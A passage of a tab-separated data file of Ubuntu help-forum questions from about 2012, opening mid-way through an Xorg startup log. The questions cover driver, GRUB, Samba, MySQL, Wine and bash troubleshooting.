[ 4.887 ] module class : x.org video driver [ 4.892 ] ( ii ) loadmodule : `` nouveau '' [ 4.894 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 4.894 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 4.894 ] compiled for 1.11.3 , module version = 1.0.2 [ 4.894 ] module class : x.org video driver [ 4.894 ] abi class : x.org video driver , version 11.0 [ 4.894 ] ( ii ) loadmodule : `` nv '' [ 4.895 ] ( ww ) warning , could n't open module nv [ 4.895 ] ( ii ) unloadmodule : `` nv '' [ 4.895 ] ( ii ) unloading nv [ 4.895 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 4.895 ] ( ii ) loadmodule : `` vesa '' [ 4.895 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 4.896 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 4.896 ] compiled for 1.11.3 , module version = 2.3.0 [ 4.896 ] module class : x.org video driver [ 4.896 ] abi class : x.org video driver , version 11.0 [ 4.896 ] ( ii ) loadmodule : `` fbdev '' [ 4.896 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 4.896 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 4.896 ] compiled for 1.11.3 , module version = 0.4.2 [ 4.896 ] abi class : x.org video driver , version 11.0 [ 4.896 ] ( == ) matched nvidia as autoconfigured driver 0 [ 4.896 ] ( == ) matched nouveau as autoconfigured driver 1 [ 4.896 ] ( == ) matched nv as autoconfigured driver 2 [ 4.896 ] ( == ) matched vesa as autoconfigured driver 3 [ 4.896 ] ( == ) matched fbdev as autoconfigured driver 4 [ 4.896 ] ( == ) assigned the driver to the xf86configlayout [ 4.896 ] ( ii ) loadmodule : `` nvidia '' [ 4.896 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 4.896 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 4.896 ] compiled for 4.0.2 , module version = 1.0.0 [ 4.896 ] module class : x.org video driver [ 4.896 ] ( ii ) unloadmodule : `` nvidia '' [ 4.896 ] ( ii ) unloading nvidia [ 4.896 ] ( ii ) failed to load module `` nvidia '' ( already loaded , 32610 ) [ 4.896 ] ( ii ) loadmodule : `` nouveau '' [ 4.897 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 4.897 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 4.897 ] compiled for 1.11.3 , module version = 1.0.2 [ 4.897 ] module class : x.org video driver [ 4.897 ] abi class : x.org video driver , version 11.0 [ 4.897 ] ( ii ) unloadmodule : `` nouveau '' [ 4.897 ] ( ii ) unloading nouveau [ 4.897 ] ( ii ) failed to load module `` nouveau '' ( already loaded , 32610 ) [ 4.897 ] ( ii ) loadmodule : `` nv '' [ 4.897 ] ( ww ) warning , could n't open module nv [ 4.897 ] ( ii ) unloadmodule : `` nv '' [ 4.897 ] ( ii ) unloading nv [ 4.897 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 4.897 ] ( ii ) loadmodule : `` vesa '' [ 4.898 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 4.898 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 4.898 ] compiled for 1.11.3 , module version = 2.3.0 [ 4.898 ] module class : x.org video driver [ 4.898 ] abi class : x.org video driver , version 11.0 [ 4.898 ] ( ii ) unloadmodule : `` vesa '' [ 4.898 ] ( ii ) unloading vesa [ 4.898 ] ( ii ) failed to load module `` vesa '' ( already loaded , 0 ) [ 4.898 ] ( ii ) loadmodule : `` fbdev '' [ 4.898 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 4.898 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 4.898 ] compiled for 1.11.3 , module version = 0.4.2 [ 4.898 ] abi class : x.org video driver , version 11.0 [ 4.898 ] ( ii ) unloadmodule : `` fbdev '' [ 4.898 ] ( ii ) unloading fbdev [ 4.899 ] ( ii ) failed to load module `` fbdev '' ( already loaded , 0 ) [ 4.899 ] ( ii ) nvidia dlloader x driver 295.40 thu apr 5 21:38:35 pdt 2012 [ 4.899 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 4.899 ] ( ii ) nouveau driver date : wed sep 12 13:42:43 2012 +0200 [ 4.899 ] ( ii ) nouveau driver for nvidia chipset families : [ 4.899 ] riva tnt ( nv04 ) [ 4.899 ] riva tnt2 ( nv05 ) [ 4.899 ] geforce 256 ( nv10 ) [ 4.899 ] geforce 2 ( nv11 , nv15 ) [ 4.899 ] geforce 4mx ( nv17 , nv18 ) [ 4.899 ] geforce 3 ( nv20 ) [ 4.900 ] geforce 4ti ( nv25 , nv28 ) [ 4.900 ] geforce fx ( nv3x ) [ 4.900 ] geforce 6 ( nv4x ) [ 4.900 ] geforce 7 ( g7x ) [ 4.900 ] geforce 8 ( g8x ) [ 4.900 ] geforce gtx 200 ( nva0 ) [ 4.900 ] geforce gtx 400 ( nvc0 ) [ 4.900 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 4.900 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 4.900 ] ( ++ ) using vt number 7 [ 4.902 ] ( ii ) loading sub module `` fb '' [ 4.902 ] ( ii ) loadmodule : `` fb '' [ 4.902 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 4.902 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 4.902 ] compiled for 1.11.3 , module version = 1.0.0 [ 4.902 ] abi class : x.org ansi c emulation , version 0.4 [ 4.902 ] ( ii ) loading sub module `` wfb '' [ 4.902 ] ( ii ) loadmodule : `` wfb '' [ 4.903 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 4.905 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 4.905 ] compiled for 1.11.3 , module version = 1.0.0 [ 4.905 ] abi class : x.org ansi c emulation , version 0.4 [ 4.905 ] ( ii ) loading sub module `` ramdac '' [ 4.905 ] ( ii ) loadmodule : `` ramdac '' [ 4.905 ] ( ii ) module `` ramdac '' already built-in [ 4.907 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 4.907 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 4.907 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 4.912 ] ( ww ) falling back to old probe method for vesa [ 4.912 ] ( ww ) falling back to old probe method for fbdev [ 4.912 ] ( ii ) loading sub module `` fbdevhw '' [ 4.912 ] ( ii ) loadmodule : `` fbdevhw '' [ 4.912 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 4.912 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 4.912 ] compiled for 1.11.3 , module version = 0.0.2 [ 4.912 ] abi class : x.org video driver , version 11.0 [ 4.912 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 4.912 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 4.912 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 4.912 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 4.912 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 4.912 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 5.442 ] ( ee ) nvidia ( 0 ) : failed to initialize the display subsystem for the nvidia [ 5.442 ] ( ee ) nvidia ( 0 ) : graphics device ! [ 5.442 ] ( ee ) nvidia ( 0 ) : failed to get supported display device ( s ) [ 5.442 ] ( ee ) nvidia ( 0 ) : failed to initialize dac hal [ 5.442 ] ( ii ) unloadmodule : `` nvidia '' [ 5.442 ] ( ii ) unloading nvidia [ 5.442 ] ( ii ) unloadmodule : `` wfb '' [ 5.442 ] ( ii ) unloading wfb [ 5.442 ] ( ii ) unloadmodule : `` fb '' [ 5.443 ] ( ii ) unloading fb [ 5.443 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 5.443 ] fatal server error : [ 5.443 ] no screens found [ 5.443 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 5.443 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 5.443 ] [ 5.447 ] ddxsiggiveup : closing log [ 5.447 ] server terminated with error ( 1 ) . closing log file .
228593	syscall_table_32.s file not found	i want to add a systemcall to linux , but in training data we need to change the file linux/arch/i386/kernel/entry.s or arch/x86/kernel/syscall_table_32.s . i can not found the files . i looked and could not find and i have not a folder named i386 . please help me . is necessary .
228598	`` ubuntu one '' authentication failure in windows 7	i just updated the ubuntu one client on my windows 7 machine today . when i try to sign in , i receive the `` authentication failed '' error message , even though the same credentials work on the ubuntu one website and my ubuntu 11 machine at work . any suggestions ?
228601	ubuntu does n't boot due to grub-problems	users out there , i came here with the spark of a hope , that you could help me . i want to get rid of my old winxp , because the game-support for it seems to slowly expire now ... so i took a second drive , just an old empty one i had at hands ( ata-maxtor 90648d3 ) , plugged of the other drive with winxp , so that it could n't be harmed , and started the installationof ubuntu 12.04 . everything went as it was supposed to , until the end . normal shutdown after successful installation process . but when i tried to boot my new ubuntu from the hdd , it said : error : out of disk . grub rescue > so , what to do now ? i already tried a lot of things in the terminal , e.g . the update-grub as mentioned on http : //opensource-sidh.blogspot.de/2011/06/recover-grub-live-ubuntu-cd-pendrive.html . everything worked , he did n't complain about a missing data or anything , but at the end of the day he still was n't able to boot ! next step was to change the etc/default/grub-file , so that it could load the ata-drivers first , so that there is now problem with my drive . but even this did n't seem to have any effect , i 'm still stuck with ubuntu in the live-cd-mode ... if there was anybody to help me out there , i would be very glad . thanks for any support , dave p.s . : i even tried to fix it with boot-repair , a small tool for ubuntu , and it created a file with data that could probably help you to help me . you can find it on http : //paste.ubuntu.com/1428022/ update : at work i have a wdc wd3200ys-01pgb0 drive and everything is working . at home , i tried it with a ata-maxtor . the rest as above ...
228602	is it possible that unity would some day switch back to mutter ?	i remembered that the first unity was indeed built on mutter , but later ported to compiz due to poor performance . i also know canonical practically incorporated compiz to work closely for future unity , so this is getting less likely . but compiz just seems pretty outdated now that gnome3/gtk3/mutter is becoming more mainstreamed , and it is known to deliver some performance issue , but on the other hand mutter seems pretty good and is still steadily developing now , i 'm just wondering if anyone related to the project is still testing and evaluating the possibility of unity on mutter ? not that you have to tell me now if you 're going to do it or not . i just wan na know if anyone is considering it . thanks .
228603	samba sharing from ubuntu to win7	i have installed and configured a samba server . so far it works well until i try to log in . when the password box pops up from a win7 machine , i enter the details but it says `` wrong details '' . the second user i have set up does n't have password restrictions , so i can log in directly into that account . the 3rd user i have set up , again tells me to get permission from the network administrator . any help on this getting resolved would be highly appreciated .
228609	why is my wordpress installation unable to create a directory ?	i am a new user of ubuntu 12.04 64 bit and i want to test wordpress on my local pc installation . i 've only installed lamp and the latest version of wordpress for now . further actions were creating a directory www in /home , i.e /home/www install wordpress in it . changed apache to use /home/www instead of /var/www apache is running smoothly & wordpress seems to be so as well . however , if try to change my background of my wordpress blog it throws an error unable to create directory wp-content/uploads/2012/12 . is its parent directory writable by the server ? plese help me to resolve my problem .
228611	installing fifa 13	is it possible to install fifa 13 and origin using wine . my graphics card is ati and its driver is installed in ubuntu . i wanted to install fifa 13 using wine . when i tried fifa 12 , it was installed and getting freezed on the game launch .
228617	cds and dvds wo n't play or burn in ubuntu 12.10	i am trying to burn an iso image to dvd but when i put the disc in the tray and close it , ubuntu wo n't recognise it . the same thing happens when i try to play music on a cd . there is a whirring noise , and a few lights flash . if someone can tell me what tests to run , i 'll kindly oblige and hopefully sort it out . thanks in advance ... .
228619	disable sound through hdmi permanently	i 'm running ubuntu 10.10 on my laptop using an external monitor . the monitor is connected by a hdmi cable . the external monitor does not have boxes , it does have an audio exit for a headphone/.. . now when i plug in my external monitor , i want to keep using my laptops boxes . now it automatically sends the sound through the hdmi port instead . i can easily change the appropriate settings in the sound configuration menu : i go to hardware and can select the device i want to use : analog surround 4.0 output , instead of the hdmi one . this works and i can hear sound through my laptop boxes . but i have to change this setting every time again when i plug in my external monitor , when i wake my laptop from the suspended state , etc . how can i make this the default setting , without having to reset it all the time ? thanks !
228624	fglrx amd catalyst 12.6 does n't compile in ubuntu 12.10 ( 64 bit or 32 bit )	ubuntu wo n't compile the amd catalyst driver package 12.6 from the amd website . after package creation and during installation i see in /var/lib/dkms/fglrx/8.970/build/make.log there is an error during compiling . this really sucks because the ubuntu repository fglrx package does n't see my radeon hd3450 . here is the output of the logfile : dkms make.log for fglrx-8.970 for kernel 3.5.0-19-generic ( i686 ) thu dec 13 06:38:24 cst 2012 amd kernel module generator version 2.1 doing makefile based build for kernel 2.6.x and higher rm -rf *.c *.h *.o *.ko *.a . ? ? * *.symvers make -c /lib/modules/3.5.0-19-generic/build subdirs=/var/lib/dkms/fglrx/8.970/build/2.6.x modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-19-generic' cc [ m ] /var/lib/dkms/fglrx/8.970/build/2.6.x/firegl_public.o /var/lib/dkms/fglrx/8.970/build/2.6.x/firegl_public.c : in function ‘kcl_mem_alloclinearaddrinterval’ : /var/lib/dkms/fglrx/8.970/build/2.6.x/firegl_public.c:2152:5 : error : implicit declaration of function ‘do_mmap’ [ -werror=implicit-function-declaration ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /var/lib/dkms/fglrx/8.970/build/2.6.x/firegl_public.o ] error 1 make [ 1 ] : *** [ _module_/var/lib/dkms/fglrx/8.970/build/2.6.x ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-19-generic' make : *** [ kmod_build ] error 2 build failed with return value 2 oh well , back to windows 7 .
228626	ubuntu 12.10 unity removing	i just installed new ubuntu ( before it was 10.x ) and i do n't want to use new unity apperance , i prefer the old one . i googled , that on ubuntu 11 , it could 've been turned off by logout and just switching . is something like this on this new ubuntu 12.10 ? thanks for answers
228629	a question about kernel updates , ubuntu 12.04	it looks like there are more recent kernels than the one i am using . synaptic reports my version as 3.2.0.34.37 ( as my reference ) i read the other day about kernel releases , forgetting to write down the version numbers . if , in fact , we run behind ( ubuntu ) on upgrading our kernel thru the software updater , that would be ok , i just need to get my mind around that . further information much appreciated ! it appears upon reading further on this , that i could install newer kernels , but that there is some risk involved . i have , in fact , decided to read more on the subject before proceeding . for instance , as a fail-safe , i could easily remove the kernel if it did n't suit ( nvidia , etc ) and go back to using my present kernel . maybe more bother than it is worth ? opinions appreciated on this point as well , of course !
228630	how to download wine ( wine1.5-i386 broken package error ) ?	i have tried : sudo add-apt-repository ppa : ubuntu-wine/ppa sudo apt-get update sudo apt-get install wine1.5 and it failed . the error seems to be : the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.19-0ubuntu1 ) but it is not installable e : unable to correct problems , you have held broken packages . i need wine1.5-i386 but its not on ubuntu , so i ca n't install wine because wine1.5-i386 is part of it . when i try to get wine in the ubuntu store i get the same error with less details .
228631	how to close x server ?	nvidia-installer log file '/var/log/nvidia-installer.log' creation time : thu dec 13 21:28:38 2012 installer version : 304.64 path : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin nvidia-installer command line : ./nvidia-installer using : nvidia-installer ncurses user interface - > the file '/tmp/.x0-lock ' exists and appears to contain the process id '1200 ' of a runnning x server . error : you appear to be running an x server ; please exit x before installing . for further details , please see the section installing the nvidia driver in the readme available on the linux driver download page at www.nvidia.com . please help me fix this .
228635	libreoffice presenter console in single window	i want to see what presenter console looks like while i design my slide-notes in libreoffice impress for my talks . i 'm working on a single-monitor system but presenter console can only be enabled ( slide show -- > settings ) when a second monitor is present . is there a way to show ( only ) presenter console on a single monitor ? thanks in advance !
228645	conflict between variable substitution and cjk characters in bash	i encountered a problem with variable substitution in the bash shell . say you define a variable a . then the command $ > echo $ { a// [ 0-4 ] / } prints its value with all the numbers ranged between 0 and 4 removed : $ > a= '' hello1265-3world '' $ > echo $ { a// [ 0-4 ] / } hello65-world this seems to work just fine , but let 's take a look at the next example : $ > b= '' 你1265-3好 '' $ > echo $ { b// [ 0-4 ] / } 你1265-3好 substitution did not take place : i assume that is because b contains cjk characters . this issue extends to all cases in which square brackets are involved . surprisingly enough , variable substitution without square brackets works fine in both cases : $ > a= '' hello1265-3world '' $ > echo $ { a//2/ } hello165-3world $ > b= '' 你1265-3好 '' $ > echo $ { b//2/ } 你165-3好 is it a bug or am i missing something ? i use lubuntu 12.04 , terminal is lxterminal and echo $ bash_version returns 4.2.24 ( 1 ) -release . edit : andrew johnson in his comment stated that with gnome-terminal 4.2.37 ( 1 ) -release the command works fine . i wonder whether it is a problem of lxterminal or of its specific 4.2.24 ( 1 ) -release version . edit : i tried it with gnome-terminal on lubuntu 12.04 but the problem is still there ...
228655	mplayer subtitle change color in config file	how change mplayer subtitle from white to yellow ? also how change subtitle font to ubuntu-font-family ?
228662	i have problems upgrading from 10.10 - the maverick meerkat - to latest version	i have problems upgrading from 10.10 - the maverick meerkat - to latest version . i receive the message : a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/source/sources.gz 404 not found , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/binary-i386/packages.gz 404 not found , e : some index files failed to download , they have been ignored , or old ones used instead . i am in copenhagen , denmark and i ca n't understand why i can not update to the latest version of ubuntu . i am waiting for a suggestion.thank you .
228665	how would i see a list of current packages and compare them to the ones being upgraded ?	i 'm running 12.10 on a server and i have a list of packages that need to be upgraded . however i can run the command sudo aptitude to see what they are and what their about which is fine . my question is , `` is there a way to see the current ones installed compared to the ones i am about to install ? '' that is , can i compare the packages before saying , `` yes , take this one '' or `` no , do n't take that one '' ? also how do you say `` no , do n't take that one '' ? ( sort of like cherry picking which updates i want )
228667	upload file from url	i have been using windows for a while , and with it there is a feature when you want to upload a photo ( for example ) to a website , you click on the `` choose file '' in chrome to upload a photo , a `` file explorer '' opens , and instead of selecting a file from the hard drive you can paste a url into the `` file explorer '' and press open and it will download the file from the web to your temporary files , and use it to be uploaded . is there any way i can do that in ubuntu 12.10 ? here is the windows example : upload from url via file explorer
228669	sudo command and how to auto get password	i got a problem that : i have a file .sh # ! /bin/bash var= $ ( zenity -- forms -- title= '' tắt giờ vợ yêu nhé '' \ -- text= '' vợ muốn tắt máy sau bao nhiêu phút nữa '' \ -- separator= '' , '' \ -- add-entry= '' vợ điền số vào đây '' ) case $ ? in 0 ) sudo shutdown -h $ var ; ; 1 ) exit 0 ; ; -1 ) echo `` an unexpected error has occurred . '' ; ; esac how can sudo command autofill the password from echo command or a file . i read about sudo -s options , but i dont know how it works . anyone can give an example about it ! thanks guys
228672	ubuntu 12.04 dual boot using windows 7 mbr	i 'm doing this manually . chose to not use easybcd . everythings on new setup so i can reformat as many times as i need to get it right . installed win7 first , set up partitions , installed ubuntu 12.04 , inadvertently overwrote windows mbr with grub , repaired windows mbr , created extra partition for boot/grub , reinstalled ubuntu 12.04 this time using correct partitions , downloaded ext2fsd so windows can see grub partition , used copy function to `` copy '' boot.img file from grub folder , pasted direct to c drive , using windows bcdedit i created the entry to connect my boot.img ( copy ) which is in windows c drive , now the windows boot manager gives me the options of either win7 or ubuntu ... great except that the ubuntu choice gets me nowhere . message is `` the selected entry could not be loaded ... '' and gives file \ubuntu.pbr and status 0xc000000f . i 'm considering deleting the bcd entry , then creating a `` shortcut '' of the boot.img in windows c drive , then back to bcdedit to create the entry pointing to the shortcut . is this what i should do ? please do n't tell me to override windows mbr with the grub install function or point to easybcd ( i may have to go that route anyway ) thank you , thank you , thank you ... from the bottom of my somewhat past newbie heart . xana40
228673	change ra0 to wlan0 in ubuntu 10.10	i am trying to find a way to change the name of my ralink interface to the usual wlan0 . the application i use is looking for this interface but since we changed our wifi adapter form intel to ralink we miss the wlan0 because ralink uses ra0 instead . on all the forums and blogs i read that you need to change that in /etc/sysconfig/network-scripts/ifcfg-ra0 . ubuntu unfortunately does not have a /etc/sysconfig folder .
228678	how to use the new feature of remote login in ubuntu 12.10 ?	recently i have upgraded ubuntu 12.04 to 12.10 . i saw a new feature of remote login under the login page . how can i use that remote login ? i have got the ubuntu live account . searched on internet but the info was not useful .
228680	what 's the best office suite for 12.10 , especially with respect to formatting and equation editing tools ?	i 've tried running ms office through wine but it failed to install correctly . as for libreoffice it has some limitations when it comes to writing equations which is important for me seeing how i 'm a training to become a mathematician next year . i 'll also need high-level formatting tools . which office suite would best suit my needs taking into consideration the aforementioned problems/requirements ?
228681	why does my mysql remote-connection fail ( vlan ) ?	ubuntu-community ! again i have a problem with my special friend mysql : d i have got two servers - a database-server and a web-server - who are connected via vlan . now i want the web-server to have remote access to the database-server 's mysql . so i created the user user in mysql.user . user 's host is xxx.yyy.zzz.9 which is the internal ip-address of the web-server . xxx.yyy.zzz.0 is the network . i also created user with host % . as long as i use mysql on the database-server logging in as user , everything works fine . but trying to log in as user from xxx.yyy.zzz.9 using mysql -h xxx.yyy.zzz.8 -u user -p ( where xxx.yyy.zzz.8 is the database-server 's internal ip ) , i get error 2003 ( hy000 ) : ca n't connect to mysql server on 'xxx.yyy.zzz.8 ' ( 110 ) so i tried to activate bind-address in the my.cnf file . well , if i use xxx.yyy.zzz.8 , nothing changes . but if i try xxx.yyy.zzz.9 and try to restart mysql , i get mysql stop/waiting start : job failed to start i checked the log files and found - nothing . the database-server 's mysql does n't even register , that the web-server tries to connect remotely . my idea is , that maybe i did n't configure the vlan properley , even though i asked someone who actually knows such stuff and he told me , i did everything right . what i wrote into /etc/networking/interfaces is : # the vlan auto eth1 iface eth1 inet static address xxx.yyy.zzz..8 netmask 255.255.255.0 network xxx.yyy.zzz.0 broadcast xxx.yyy.zzz.255 mtu 1500 ifconfig returns eth1 link encap : ethernet hwaddr xxxxxxxxxxxxxx inet addr : xxx.yyy.zzz.8 bcast : xxx.yyy.zzz.255 mask:255.255.255.0 inet6 addr : xxxxxxxxxxxxxxx/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:241146 errors:0 dropped:0 overruns:0 frame:0 tx packets:9765 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:17825995 ( 17.8 mb ) tx bytes:566602 ( 566.6 kb ) memory : fb900000-fb920000 for the eth1 , what is , what i configured . ( this is for the database-server , the web-server looks similar ) . ethtool eth1 returns : settings for eth1 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : no advertised auto-negotiation : yes speed : 100mb/s duplex : full port : twisted pair phyad : 1 transceiver : internal auto-negotiation : on mdi-x : unknown supports wake-on : d wake-on : d current message level : 0x00000003 ( 3 ) drv probe link detected : yes ( this is for the database-server , the web-server looks similar ) . actually i think , everything is right , but it still does n't work . is there someone with an idea ? edit : i commented ou bind-address in my.cnf after it did n't work .
228683	can i install an ubuntu app from remote laptop ?	is their a way to push/send and ubuntu-app/deb-file to be install on my ubuntu laptop ? usecase ... laptop 1 . i find an app , i need to install ! but iâ´am not at home . i just push it to my other laptop to be install.. laptop 2 . i am now at home . my laptop 2 view an dialog asking to install the app i send from laptop 1 . can this be do ? .. ssh ? question-update can it be done so it open ubuntu software center and then laptop2-user only need to write their password and press ok ? for non-tec users.. like my father ...
228684	refresh banshee album art	i usually just copy ~/.config/banshee-1 , and ~/.gconf/apps/banshee-1 when i 'm moving from one computer to the other , if i keep the path of the folders . i get to keep my music library intact with the playlists i have . the problem with this method is that , the album arts does n't carry over nicely . you 'd have to play every album to get the album art to appear . anyone knows a workaround , to maybe force banshee to reload all album art ? i saw this , but not quite what my issue is ? i tried banshee -- fetch-artwork , but did n't work too well kenneth @ dv7 : ~ $ banshee -- fetch-artwork [ warn 11:23:38.200 ] dbus support could not be started . disabling for this sessi on . - system.exception : error 111 : connection refused ( in `dbus-sharp ' ) at dbus.unix.unixsocket.connect ( system.byte [ ] remote_end ) [ 0x00000 ] in < filen ame unknown > :0 at dbus.transports.unixnativetransport.openabstractunix ( system.string path ) [ 0x00000 ] in < filename unknown > :0 at dbus.transports.unixnativetransport.open ( system.string path , boolean abstr act ) [ 0x00000 ] in < filename unknown > :0 at dbus.transports.unixtransport.open ( dbus.addressentry entry ) [ 0x00000 ] in < filename unknown > :0 at dbus.transports.transport.create ( dbus.addressentry entry ) [ 0x00000 ] in < fi lename unknown > :0 at dbus.connection.openprivate ( system.string address ) [ 0x00000 ] in < filename unknown > :0 at dbus.connection..ctor ( system.string address ) [ 0x00000 ] in < filename unknow n > :0 at dbus.bus..ctor ( system.string address ) [ 0x00000 ] in < filename unknown > :0 at dbus.bus.open ( system.string address ) [ 0x00000 ] in < filename unknown > :0 at dbus.bus.get_session ( ) [ 0x00000 ] in < filename unknown > :0 system.exception : unable to open the session message bus . ( in `dbus-sharp ' ) at dbus.bus.get_session ( ) [ 0x00000 ] in < filename unknown > :0 at dbus.busg.init ( ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.dbusconnection.connect ( system.string servicename , boo lean init ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.dbusconnection.grabdefaultname ( ) [ 0x00000 ] in < filena me unknown > :0 [ info 11:23:38.286 ] running banshee 2.6.0 : [ ubuntu 12.10 ( linux-gnu , x86_64 ) @ 2012-10-11 06:19:37 utc ] ( banshee:21865 ) : gconf-warning ** : client failed to connect to the d-bus daemon : failed to connect to socket /tmp/dbus-vlxs6riwsn : connection refused [ warn 11:23:38.948 ] could not read gconf key core.send_anonymous_usage_data - g lib.gexception : no d-bus daemon running ( in `gconf-sharp ' ) at gconf.client.get ( system.string key ) [ 0x00000 ] in < filename unknown > :0 at banshee.gnomebackend.gconfconfigurationclient.tryget [ boolean ] ( system.strin g namespace , system.string key , system.boolean & result ) [ 0x00000 ] in < filename u nknown > :0 ( banshee:21865 ) : gconf-warning ** : client failed to connect to the d-bus daemon : failed to connect to socket /tmp/dbus-vlxs6riwsn : connection refused [ warn 11:23:39.239 ] could not read gconf key core.send_anonymous_usage_data - g lib.gexception : no d-bus daemon running ( in `gconf-sharp ' ) at gconf.client.get ( system.string key ) [ 0x00000 ] in < filename unknown > :0 at banshee.gnomebackend.gconfconfigurationclient.tryget [ boolean ] ( system.strin g namespace , system.string key , system.boolean & result ) [ 0x00000 ] in < filename u nknown > :0
228685	sitronix st9rm01 touchscreen not working	i have a sitronix st9rm01 touchscreen that i 'm trying to get working with ubuntu 12.04 . the touchscreen is apparently recognized by linux and x - the hid_multitouch module is loaded , and lsinput and xinput both list the touchscreen as an input device - but touching the screen does absolutely nothing , and xinput test shows no events . the same touchscreen works just fine in windows . how can i troubleshoot from here ? any suggestions ?
228687	difference between oem install and custom ubuntu image	i 'm looking into the best way to deploy a customized ubuntu image and it looks like i have two options : to make an `` oem install '' version to make a custom ubuntu image could someone help me understand the difference between these two methods of customizing a ubuntu install ? it appears to me that both these methods allow for elaborate customization of the image while allowing the user to enter their own end-user details ( time zone , username , password , etc . )
228688	saving has been disabled by system administrator	i have coded my own html website recently , and today i wanted to add a google calendar object to it . today i got an error when trying to save the google calendar code . i am the admin on my ubuntu pc , but i could n't save . i thought of clicking close and seeing if it came up with the save as dialog , but it did n't , the message was : are you sure you want to close without saving ? saving has been disabled by your system admin . or something like that . i tried looking at the properties of the file , and it had me as read only in one of the selections , so i changed that to read and write , but to no avail . i did not save as root when i last edited the file , so i do n't get what 's going on .
228690	why iso master ( editor ) does not read windows images	i have the followjng problem with iso master software : i try to edit windows 7 iso image $ isomaster windows7.iso the file does open , unfortunately all i get is readme with message : this disc contains a `` udf '' file system and requires an operating system that supports the iso-13346 `` udf '' file system specification . isomaster comes form ubuntu repository , i am using 12.04 . the system has kernel support for udf installed , i can mount above iso ( mount -o loop ) and see its content read only . any idea how to fix it ? using other than isomaster tool is also an option . regards , jacek
228692	ubuntu cobbler server - importing distros	i setup and fully configured ubuntu-12.04-server machine with cobbler/dhcp running in about 10 minutes ( compared to taking over an hour on centos 5.8 ) . i discovered the cobbler import which appears to be useful . does this remove the need to use a cobbler distro add ? whenever i run a cobbler report after a successful import of ubuntu desktop iso : sudo cobbler import -- name=ubuntu -- path=/mnt -- breed=debian task started : 2012-12-13_163245_import task started ( id=media import , time=thu dec 13 16:32:45 2012 ) found a debian/ubuntu compatible signature : pool adding distros avoiding symlink loop avoiding symlink loop avoiding symlink loop associating repos associating kickstarts *** task complete *** i just get the following ( nothing ) : distros : ========== profiles : ========== systems : ========== repos : ========== images : ========== mgmtclasses : ========== packages : ========== files : ========== i was rather hoping that i would n't have to do the traditional copying of all files in /mnt to a new /distro directory and then perform a cobbler distro add -- initrd=/path/to/inird -- kernel=/path/to/kernel maybe i am mistaken about what the import actually does for me . if someone could elaborate on what the import is actually for please do .
228695	does anyone know of any work being done on eee transformer ?	i recently got a ( few ) nexus 7 's to install and enjoy ubuntu on . which is great and all , but from what i 've read online and the issues i have experienced myself the nexus 7 has way to many serious defects . such as : audio jack not working screen lifting screen ghosting out ( the very first one ) instant drop in battery life ( happened to one of mine ) internal memory malfunctions ( the latest issue i 've had , the internal memory went completely bad ) if you need to read other horror stories you can simply check out xda developers forum , lots of people are having issues . i 'd really like to enjoy ubuntu on a different device , i think the transformer prime would make way more sense ( usability and stability wise ) . have there been any hacks/mods to get it running on this device ?
